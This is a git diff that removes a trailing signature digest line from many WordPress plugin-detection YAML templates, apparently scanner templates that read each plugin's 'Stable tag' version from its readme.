a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 453798c2c9..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aff334823880af03cabdce9d179e83bf095d24a61f39eb32574e09159fc0873402202d0e507a40d2304a8babfcefd1cc46753c3364592ac4156c363d2bbc80a54b8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 1574d8b628..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ed69c87738ff54382126ab89bbe8022bb2f9066d9f0e290a2c35f2db47f4baf602201577632e91003d34e734ed9e5c06039bbea6f0eb55d21c25cfa91bdf947a2cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 908bfe0542..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100beb131fd1d2b873d2dbf7ac786d891e9d2c8474d0f1c20292a4eebfc870dd8b202203d6adc494d9c4e26474e642bfb305a8118de447f7ef41ffb850220f861a7962c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 0c3f15abd4..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d7a2f2dc764cc8544d5c47cf8977054dc3e0e192154f8b681cb29573cc6ab42902201e80f88d7b7db635f68ef1d770c249dd06a11fe9f909b466138f5d0ae51283ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 2e24c8fe64..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c6d49796ef01c2e7b40e4c21ebce8fdb1f8f4eb5dee515a1a0b812016cb64810022069de640da3596cb11da5924d37cbef672d5d9f3e82286aaab60244ef4d730111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 51c0b1f628..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100afca5ebad3c03fad66fb0eecf7ef04141a06361edf7cdf96ecab71726dfe95bb02203c31229b9d50540dec538ce5d0205a0963979da444ac47538d28bc270d49a286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index ace4b65857..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c69dc9beca44596b284cca3163fe4668ca8260978214116b8d2600bffe9f84f7022100df5ece11265548e3aa8e3e6a1ba26b6ae6ab8630068165bd7d6b0282ec8158bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index e650383692..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210080b638b34f536da0a1166ceaf082bd231b15dc3462bea9c1de776d8ecef25ce1022067fb3db4a669f25688387ce33f172d62edf479cf73fa90f69345ea84b4bdc171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f010cddb3a..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f5687cb227e3fb66c81573e44e549a1f74bd53f8cad8138c9a128c5ee4196f2022100d2219cd9a75b2555120792139b94d57867599a30f3fd86c9cb42244e833e1220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 306ee63727..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022062900d2371dc2325944b274698d8fbb044f3a2a834d9dad79fdbf5134212c48b022100c991f729e66eb3dc35698d631d29da59ae480de901234ba1c0c6e031b057a6a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 40163c776d..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022038dc74d49c38fce238745a206d3e0901f9bc3333d55a9bb69fc114c8152cc986022100bb3c28a8cb97fd3d352d5efd0ce0d73d46b08f0c462ef1931da81ed665588895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index c6903e0607..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cd01be77d1705bfd3d85ffeb1c924885be20e59a3c294cbdf7f628aec6a4f2ff0220576f4390391e3d6ea42e560ab2bcbfd885a84799533881506f0a972d92cfca88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 19dc252cae..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c01592a2dcb52623c66711a9de19bcb2d66f4557752d0c1f012256d5894b02f1022100967b80cfc353da6f58b3103d7d9f157506b15b4a4eb7939bbcbf509a7f989053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index d57e4ca29d..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cc3cc393241e79731e89f61b66a9cc5a6fb51b0cfd5d8c7d83cd5ad07113863b022100ee08a4c573e21dc6b9bc9af0feb2098088e8f9c8913fc6d71a180c2a39b34495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index ee18f86429..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b6de6a51e2984a33fab7c34ce2770621af6a43f2144a6eeba1d8929672f7f340221009295c0cc91a54b2d802e0996c3c4b6e5a14006b22d2de18554c288b03756b127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 80a72a0b98..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220658baef645e032b3e38fb9668a101de2b8605d871a4f5084f02db9d4efffb03a02207e0362835a96aa05d693544b2c64bc8c731399b80ebb61ca0542b901630b4b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 803726a1d6..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eae22499704059fe18dd0c66f47993edae1064c02e0019ce909bbc1fd5ea51b3022100d6901d710f10cd5c57bd63dd64f6a9fc661e6c092efaa613bbb310b15d8a45f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index e4b313f8e5..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b5266936c3368e7e4f09645618d439bcf81b6b1a1ac49ffedd285d7e8394439a02205023836cff8a2d56faa4c42e920c3cf7e9786ec3e7e7d96856c14e3a150494bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index df74faf508..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008474e1d69abed375c58117af304f022d6795404626ea1e769d290bdb2d93aef9022100cddaccf430738038c5950f6249f3a1000134e85fbcf6abc9edbc356b180b04a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 0502e03b8e..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e67d19ce3df6924c2eed31cca3719bbbb53bbfa97a9675e89b9aa0f6cb0dd3102207676c215eccb143cacc798b74ae5ac3894461d367faa4c0652574d7e6064c092:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index ab1f4a2e06..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c0e2e039760a8bf85d47af06569580c7ada44c6bcf9a532619daac0e8aa9805022100f9e7a4a53f3f875d5f5c307db7ea13734e12b1b63e02a2267b291935d35776d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index c22e97b22f..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022051855aa3e0bef2dfc289751a2a8656ab141ef4671ba0db33845d08e313c6ab1902200e64a191dd4630f4397d7b0c4bf61acf6da6a887d46a157e8643395628566f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index f2fa1bde3f..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200433bb8696505271917dcb1ea1671b079ac05d40908d0828b31b4207a4a4733b02202ed0a86e20bb4aedd0987e76a6239011591b6bcd67535369fdfba4ba7afe5f28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 29fda87b15..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202937f9708172b6a6252dceaa3c4e47b67ca7e1b299a7653a669f8022a08f5fda022034f8a7e0fcb92c4799627682c0ca5e60d2d1713ca7ac2f435be969b9ccd77947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 2332e52f19..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220085feeb2b10487f7e9ae90d1941ebff7a26360be632b07da5d4603724a57bf72022100d5d68eaf9223f6bae1102995842440e66a744bab74f3f439e17b2117fdec845e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 0bdab5b743..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220776252df3f6e59b390975c15770fefe717337c158308b87d14b7a642f55e608202201111d1e004b77278561caad0d5e6dcb025c1e0bfe2b1c949f5d894f1739bd989:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 9097998e16..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c1950513d3735824d0f8ebbdf7c0cd96ecf2acb184f982fa6541fa491a2d0064022014f36fd90a87e8ea938aafd64bfde7ab8200138e1978cd8ad99213355b25876d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 80f675a623..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d809130eb113bbbc71f5b983137eb47a295b8d01a9e5df534b04abe20d7e0b330220723c33969b9c02aca4a3f066e2e7230569fda20540461439390c2b9ba1bb7665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index f1ca0bbfa9..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220540e166c41d2bc2be57b847c482d90d70e3a75917b2a595770af83bcf278b8b402201687dab9e77e4b5e16af34da41e742a459a03ece759191722e8967108d0936a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 4bb00d533a..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210084077b21e35efb04fdd807dbbba13f3ba6180d98a4b16ad3b67b918ae0b1195b022100e60a34d3b5e15ed2149b495bccd8c5affe01a5a6836b45c7f093cb388e1d8554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 91a1921213..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d9cf69ee5e4940000f3fb3f59946e794058ae8db29f7a44643c2896b4cc7a3d602204359a385e41ac38cd6aeabc096607eb3b363b71499b1d164628d5ec266ea0376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 5baec70b50..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220775dd2a3275b47b27e82742f49ff6d074c0a8416afa2e6ef27350f5f6d497d71022071d2fe68038e14c91e62aaaf3fc6b293b4b787e91d41979af4661ecca113f7f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index b45fdf054a..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e8791a4a0014db79fd98155d8ccf72359d1cdcb77d3f8bb4b600c3c6d92faaf0221009f4c20298b622cb75e3adfce4452fbfc1f74789a612024a1742678f84d50ada2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 7ef0428035..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210094c3c2bee463ebf9ab7876857209202e498ade24872b7add7d4e3f6018c5f059022100ecf3d4e841a55c6a6fbd88ac5b46ba97a84b63c1702a6856f6f3ea49b72b03b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c14227603..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bc9e7bf2f93c1e24f031ce37dd922734dfd1abdb303fc22409de1375c7dee17c02202cf8968762f12b3c6180b80a337ff6091446cf61e90a528cdddb2a1ba3833332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 2db5885123..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf2f33630f761b949751b300fa48d54764e486e03c4092f7931bd487b63e900102203ed05464ef595e9b58d3571adab92744efb499a91bf5e5ca3419a3e58bb42807:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 4f746c76b9..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d2bffd61706377b9af5cf30e22605892993c34cb7798f0f845a709c3a545da602207807973921b3779c2efef6ca89c0b9879578fc6f8ec8fa8029ffaadf6239da18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index ab9dfa7210..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204bdbabaff82d3f139c23a58e36c016f77971182daa0686dea0941c56e8d45d2f022074f557d73df4bc3d23a61adf204fbf88a118395c8e2568141512bcbb19507030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 931f01eb1e..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210096eb0ba2c3c4a08c7c6d82b1fc606d3abae947928bf8c3d383cb2b65124235d2022005c4f971d4cbe42fb4b8ad6bd7dbca0389c5c169a8876b0f78e0fafceb065a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 1099073c22..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a6ecbb95bc67733a845ecb8c8fc45ba33e98d30717440b54b5667a4103597b57022100a681567713da1987ff10ba0557ba023636b7029911b65c33c70ae1a274a6ca84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 4aa7a1a718..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c009a771ec1cc4ce22d5692af026ca8a8ba1d4b5bbac7f3a477b4c4d4c8c8089022058906a8a993c796cc6447fec77961b31ee24e99ced08d035d77e235afd0b27e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 78b073dda7..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078a855125572791da6d81450604e10c16d03678c2a4d4ec32bd7bccbe6d81a04022074d69bbedaf282cac72fed4b76919338518f0b1a9a70d1746178028e451d12eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 08bd12f036..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203451cc6eae91b6420f59926170a138cf56cfc62f1a31eb09441230453623e2f102201d219df85b3d1949a38cabcaa63cf8680399bc3e4182299c399abd7672d78481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 935b025592..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220205f23916297aa39b6ef5fde4242703606ba970a1600ba2dacf6b5c79a2bd78402201d46a8e3a2026ed2503265eae62180fabcc12c46eea62a5ff7c37cc148199849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 7a8c42d30e..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f7b520980f5be3c1b167fa19e7d2646fa3ee4f77a9796a38ff7c1fa1ee9df6cc02200437657dcb6298913fe53451a245c913cb99cd9951e2b8fe2ee989a04d4220c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 13e6271245..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf39dc73ebc5f3e1490b6afe629bae23ef8c29a874493bb71951362722b7aa07022100def12e703e8774eb4a7badf0e5d25feeb0d4ce7c41c49e01959b662c4995afee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 8b60038a61..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf00d69b841228e45375bcd476390d397febdaa2b7075731bbc3c0a762834524022036e349db19dd6ffebcfeed6794b4f50aed76f88532b0ec324350a7662f1228aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml 